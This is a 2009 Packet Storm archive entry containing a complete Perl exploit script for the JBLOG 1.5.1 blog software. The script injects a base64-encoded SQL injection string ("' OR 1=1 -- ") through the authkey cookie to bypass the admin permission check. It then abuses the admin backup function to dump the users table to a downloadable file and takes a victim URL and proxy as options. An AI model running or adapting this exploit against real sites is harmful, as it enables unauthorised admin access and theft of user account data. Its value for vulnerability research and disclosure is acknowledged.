JBLOG 1.5.1 SQL Table Backup

2009-08-15T00:00:00
ID PACKETSTORM:80327
Type packetstorm
Reporter Ams
Modified 2009-08-15T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
  
=about  
  
VENDOR  
JBLOG 1.5.1  
(maybe earlier versions vulnerable too)  
http://www.lisijie.org  
  
AUTHOR  
discovered & written by Ams  
ax330d [doggy] gmail [dot] com  
http://www.0x416d73.name/  
  
VULNERABILITY DESCRIPTION  
Both 'index.php' and 'admin.php' includes file 'common.php' which checks  
for user permission on line 81 via function 'check_user()'.  
This function is defined in file 'include/func_user.php'.  
There is another one function - 'get_cookie()' which gets cookie values.  
So, in cookies we put our evil string and further actions should be clear.  
  
Why we don't filter COOKIEs ?  
  
EXPLOIT WORK  
This exploit uses SQL-injection to create dump of users table.  
Actually, we are possible to do all administrator actions.  
  
REQUIREMENTS  
1. You need to know prefix, by default it is 'jblog_'.  
But there is no problem to find it out.  
2. Rights to write to 'cache/' folder.  
  
=cut  
  
use strict;  
use warnings;  
  
use LWP::UserAgent;  
use HTTP::Request::Common;  
use MIME::Base64;  
use Getopt::Long;  
  
Banner();  
$| = 1;  
  
my $expl_url;  
my $prefix = 'jblog_';  
my $proxy = '';  
  
GetOptions(  
'u=s' => \$expl_url,  
'pre=s' => \$prefix,  
'p=s' => \$proxy,  
) or Usage();  
  
my $spider = LWP::UserAgent->new;  
$spider->agent('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');  
$spider->default_header( 'Cookie' => $prefix . 'authkey=' . encode_base64( "1\t' OR 1=1 -- " ) );  
$spider->proxy(['http'], "http://$proxy/") if $proxy ne '';  
$spider->timeout( 30 );  
  
Exploit( $expl_url);  
  
sub Exploit {  
  
$_ = shift || Usage();  
print "\n\tExploiting:\t $_";  
  
my ($prot , $host, $path, )  
= m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?};  
$prot ||= 'http';  
  
my $url = "$prot://$host$path";  
my $defact = 'admin.php?ac=data&do=bakout&dosubmit=yes&sizelimit=2048';  
  
# First request to prepare  
my $req = GET "$url/$defact&baktables%5B%5D=${prefix}user";  
my $res = $spider->request( $req );  
my ($dir, $file) = $res->content =~ /yes&bakdir=(.*?)&(?:.*?)&filepre=(.*?)'/;  
  
# Second request to dump table  
$req = GET "$url/$defact&bakdir=$dir&step=1&baktablestr=${prefix}user&tableid=0&start=0&filepre=$file";  
$res = $spider->request( $req );  
  
# Finally checking if sql backup exists  
$req = HEAD "$url/cache/backup/$dir/${file}_1.sql";  
$res = $spider->request( $req );   
  
if ( $res->is_success ) {  
print "\n\tLooks ok, check $prot://$host${path}cache/backup/$dir/${file}_1.sql\n";  
} else {  
printf(  
"\n\tFailure, server response: %s\n\tAnyway, check: %s\n",  
$res->status_line, "$prot://$host${path}cache/backup/$dir/${file}_1.sql");  
}  
}  
  
sub Usage {  
  
print <<USAGE;  
  
Usage:  
-u Set url of victim  
optional:  
-pre Prefix, default 'jblog_' is used if no one mentioned  
-p Proxy, set as ip:port  
  
Example:  
$0 -u=http://site.com -pre=jblog_ -p=127.0.0.1:8080  
  
USAGE  
  
exit;  
}  
  
sub Banner {  
  
print <<BANNER;  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
JBLOG 1.5.1 Perl exploit  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
BANNER  
  
}  
  
  
`